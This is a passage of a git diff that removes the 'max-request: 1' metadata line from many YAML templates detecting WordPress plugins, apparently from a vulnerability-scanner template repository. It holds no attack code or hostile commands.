a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/stops-core-theme-and-plugin-updates/ metadata: - max-request: 1 plugin_namespace: stops-core-theme-and-plugin-updates wpscan: https://wpscan.com/plugin/stops-core-theme-and-plugin-updates tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index f210a2a2f9..3920c5cf56 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/sucuri-scanner/ metadata: - max-request: 1 plugin_namespace: sucuri-scanner wpscan: https://wpscan.com/plugin/sucuri-scanner tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml index f1dd1bf150..f556786f5a 100644 --- a/http/technologies/wordpress/plugins/svg-support.yaml +++ b/http/technologies/wordpress/plugins/svg-support.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/svg-support/ metadata: - max-request: 1 plugin_namespace: svg-support wpscan: https://wpscan.com/plugin/svg-support tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index a9ec913599..844e3d19a0 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/table-of-contents-plus/ metadata: - max-request: 1 plugin_namespace: table-of-contents-plus wpscan: https://wpscan.com/plugin/table-of-contents-plus tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index d38aeb0279..eb0f02f602 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/tablepress/ metadata: - max-request: 1 plugin_namespace: tablepress wpscan: https://wpscan.com/plugin/tablepress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 07c43b9d80..755efd53fa 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/taxonomy-terms-order/ metadata: - max-request: 1 plugin_namespace: taxonomy-terms-order wpscan: https://wpscan.com/plugin/taxonomy-terms-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index 83a849e11e..0403bb4e72 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/the-events-calendar/ metadata: - max-request: 1 plugin_namespace: the-events-calendar wpscan: https://wpscan.com/plugin/the-events-calendar tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/themeisle-companion.yaml b/http/technologies/wordpress/plugins/themeisle-companion.yaml index c6100637d9..cd2632ea05 100644 --- a/http/technologies/wordpress/plugins/themeisle-companion.yaml +++ b/http/technologies/wordpress/plugins/themeisle-companion.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/themeisle-companion/ metadata: - max-request: 1 plugin_namespace: themeisle-companion wpscan: https://wpscan.com/plugin/themeisle-companion tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index 1f188b66c6..b5f8b822c7 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/tinymce-advanced/ metadata: - max-request: 1 plugin_namespace: tinymce-advanced wpscan: https://wpscan.com/plugin/tinymce-advanced tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index 2c7b16cb44..85aaf7ff16 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/translatepress-multilingual/ metadata: - max-request: 1 plugin_namespace: translatepress-multilingual wpscan: https://wpscan.com/plugin/translatepress-multilingual tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 9d6afa8d3f..0af322b728 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ultimate-addons-for-gutenberg/ metadata: - max-request: 1 plugin_namespace: ultimate-addons-for-gutenberg wpscan: https://wpscan.com/plugin/ultimate-addons-for-gutenberg tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index 48481fde3b..b7ad16e281 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/under-construction-page/ metadata: - max-request: 1 plugin_namespace: under-construction-page wpscan: https://wpscan.com/plugin/under-construction-page tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index b34d196268..10fd071b0b 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/updraftplus/ metadata: - max-request: 1 plugin_namespace: updraftplus wpscan: https://wpscan.com/plugin/updraftplus tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/use-any-font.yaml b/http/technologies/wordpress/plugins/use-any-font.yaml index abec174ec3..401b0e479f 100644 --- a/http/technologies/wordpress/plugins/use-any-font.yaml +++ b/http/technologies/wordpress/plugins/use-any-font.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/use-any-font/ metadata: - max-request: 1 plugin_namespace: use-any-font wpscan: https://wpscan.com/plugin/use-any-font tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index e088ac07a6..6f95506748 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/user-role-editor/ metadata: - max-request: 1 plugin_namespace: user-role-editor wpscan: https://wpscan.com/plugin/user-role-editor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml index 8b163200bf..4404f87aab 100644 --- a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml +++ b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/velvet-blues-update-urls/ metadata: - max-request: 1 plugin_namespace: velvet-blues-update-urls wpscan: https://wpscan.com/plugin/velvet-blues-update-urls tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 2366a7dad7..8995434fce 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/w3-total-cache/ metadata: - max-request: 1 plugin_namespace: w3-total-cache wpscan: https://wpscan.com/plugin/w3-total-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 71448e61e8..8175806cb8 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/webp-converter-for-media/ metadata: - max-request: 1 plugin_namespace: webp-converter-for-media wpscan: https://wpscan.com/plugin/webp-converter-for-media tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index 717554b89f..db82bc7f43 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/webp-express/ metadata: - max-request: 1 plugin_namespace: webp-express wpscan: https://wpscan.com/plugin/webp-express tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index fba5c8b09c..03ddae57bc 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/widget-importer-exporter/ metadata: - max-request: 1 plugin_namespace: widget-importer-exporter wpscan: https://wpscan.com/plugin/widget-importer-exporter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index 631202198e..d6449bb5bf 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woo-cart-abandonment-recovery/ metadata: - max-request: 1 plugin_namespace: woo-cart-abandonment-recovery wpscan: https://wpscan.com/plugin/woo-cart-abandonment-recovery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index cc953078eb..2d5fdf1779 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woo-checkout-field-editor-pro/ metadata: - max-request: 1 plugin_namespace: woo-checkout-field-editor-pro wpscan: https://wpscan.com/plugin/woo-checkout-field-editor-pro tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 97ce674116..6b5705e20d 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woo-variation-swatches/ metadata: - max-request: 1 plugin_namespace: woo-variation-swatches wpscan: https://wpscan.com/plugin/woo-variation-swatches tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml index 6d05a6f058..dbcdb64bad 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-gateway-paypal-express-checkout/ metadata: - max-request: 1 plugin_namespace: woocommerce-gateway-paypal-express-checkout wpscan: https://wpscan.com/plugin/woocommerce-gateway-paypal-express-checkout tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index baf5af3bb5..fb9ea502ce 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-gateway-stripe/ metadata: - max-request: 1 plugin_namespace: woocommerce-gateway-stripe wpscan: https://wpscan.com/plugin/woocommerce-gateway-stripe tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index 54dce49b42..1d41b4ec2c 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-payments/ metadata: - max-request: 1 plugin_namespace: woocommerce-payments wpscan: https://wpscan.com/plugin/woocommerce-payments tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index 5fae796fdd..4fa6fc3ffe 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-paypal-payments/ metadata: - max-request: 1 plugin_namespace: woocommerce-paypal-payments wpscan: https://wpscan.com/plugin/woocommerce-paypal-payments tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index 22f812e2b8..1c1c690fcd 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-pdf-invoices-packing-slips/ metadata: - max-request: 1 plugin_namespace: woocommerce-pdf-invoices-packing-slips wpscan: https://wpscan.com/plugin/woocommerce-pdf-invoices-packing-slips tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index c637006d26..4d6702d81a 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-services/ metadata: - max-request: 1 plugin_namespace: woocommerce-services wpscan: https://wpscan.com/plugin/woocommerce-services tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index e020507ccb..42cb8bc409 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce/ metadata: - max-request: 1 plugin_namespace: woocommerce wpscan: https://wpscan.com/plugin/woocommerce tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index c92903fd79..55d6effbf5 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wordfence/ metadata: - max-request: 1 plugin_namespace: wordfence wpscan: https://wpscan.com/plugin/wordfence tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index c25b2c1c48..6786cab703 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wordpress-importer/ metadata: - max-request: 1 plugin_namespace: wordpress-importer wpscan: https://wpscan.com/plugin/wordpress-importer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 4d6dd14d25..784ba22c8a 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wordpress-seo/ metadata: - max-request: 1 plugin_namespace: wordpress-seo wpscan: https://wpscan.com/plugin/wordpress-seo tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index 7ca0870ed6..72ff55e58a 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/worker/ metadata: - max-request: 1 plugin_namespace: worker wpscan: https://wpscan.com/plugin/worker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index 4f0d9be568..8cfaa0f5a9 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-fastest-cache/ metadata: - max-request: 1 plugin_namespace: wp-fastest-cache wpscan: https://wpscan.com/plugin/wp-fastest-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index f3c481b824..85900a01a7 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-file-manager/ metadata: - max-request: 1 plugin_namespace: wp-file-manager wpscan: https://wpscan.com/plugin/wp-file-manager tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index ba214fd7ea..a7ccde0b49 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-google-maps/ metadata: - max-request: 1 plugin_namespace: wp-google-maps wpscan: https://wpscan.com/plugin/wp-google-maps tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 8f5fe8d9a5..422664a98c 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-mail-smtp/ metadata: - max-request: 1 plugin_namespace: wp-mail-smtp wpscan: https://wpscan.com/plugin/wp-mail-smtp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index 0458b13354..f0af3a748a 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-maintenance-mode/ metadata: - max-request: 1 plugin_namespace: wp-maintenance-mode wpscan: https://wpscan.com/plugin/wp-maintenance-mode tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index d570be07bf..f89f1a20b3 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-migrate-db/ metadata: - max-request: 1 plugin_namespace: wp-migrate-db wpscan: https://wpscan.com/plugin/wp-migrate-db tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index ee05e3add8..01fb12d0ad 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-multibyte-patch/ metadata: - max-request: 1 plugin_namespace: wp-multibyte-patch wpscan: https://wpscan.com/plugin/wp-multibyte-patch tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index df2487955f..1773857e15 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-optimize/ metadata: - max-request: 1 plugin_namespace: wp-optimize wpscan: https://wpscan.com/plugin/wp-optimize tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index 79ff01211c..bcd1509c68 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-pagenavi/ metadata: - max-request: 1 plugin_namespace: wp-pagenavi wpscan: https://wpscan.com/plugin/wp-pagenavi tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index 23414b3d1d..c6aca20a60 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-reset/ metadata: - max-request: 1 plugin_namespace: wp-reset wpscan: https://wpscan.com/plugin/wp-reset tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index 0178c8e9fb..810fc82cde 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-rollback/ metadata: - max-request: 1 plugin_namespace: wp-rollback wpscan: https://wpscan.com/plugin/wp-rollback tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index a04ddc6003..783d381ed8 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-sitemap-page/ metadata: - max-request: 1 plugin_namespace: wp-sitemap-page wpscan: https://wpscan.com/plugin/wp-sitemap-page tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 2ead906817..8bdc600063 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-smushit/ metadata: - max-request: 1 plugin_namespace: wp-smushit wpscan: https://wpscan.com/plugin/wp-smushit tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index dedd2e23b6..ab61cc0338 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-statistics/ metadata: - max-request: 1 plugin_namespace: wp-statistics wpscan: https://wpscan.com/plugin/wp-statistics tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 03cd7137a8..5f6fbc1f75 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-super-cache/ metadata: - max-request: 1 plugin_namespace: wp-super-cache wpscan: https://wpscan.com/plugin/wp-super-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-user-avatar.yaml b/http/technologies/wordpress/plugins/wp-user-avatar.yaml index a68d4b7d78..d67150d038 100644 --- a/http/technologies/wordpress/plugins/wp-user-avatar.yaml +++ b/http/technologies/wordpress/plugins/wp-user-avatar.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-user-avatar/ metadata: - max-request: 1 plugin_namespace: wp-user-avatar wpscan: https://wpscan.com/plugin/wp-user-avatar tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index bf9dfc3ad8..beeba7ca69 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wpcf7-recaptcha/ metadata: - max-request: 1 plugin_namespace: wpcf7-recaptcha wpscan: https://wpscan.com/plugin/wpcf7-recaptcha tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index 47911a86a5..c225df7bfd 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wpcf7-redirect/ metadata: - max-request: 1 plugin_namespace: wpcf7-redirect wpscan: https://wpscan.com/plugin/wpcf7-redirect tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index 1c25b6f488..aaad04cb76 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wpforms-lite/ metadata: - max-request: 1 plugin_namespace: wpforms-lite wpscan: https://wpscan.com/plugin/wpforms-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index b36317acd8..ff750a7d2a 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wps-hide-login/ metadata: - max-request: 1 plugin_namespace: wps-hide-login wpscan: https://wpscan.com/plugin/wps-hide-login tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index 5eb35dd17e..f1e7595ccd 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wpvivid-backuprestore/ metadata: - max-request: 1 plugin_namespace: wpvivid-backuprestore wpscan: https://wpscan.com/plugin/wpvivid-backuprestore tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index ceb2b8d600..4b2769ee46 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -7,7 +7,6 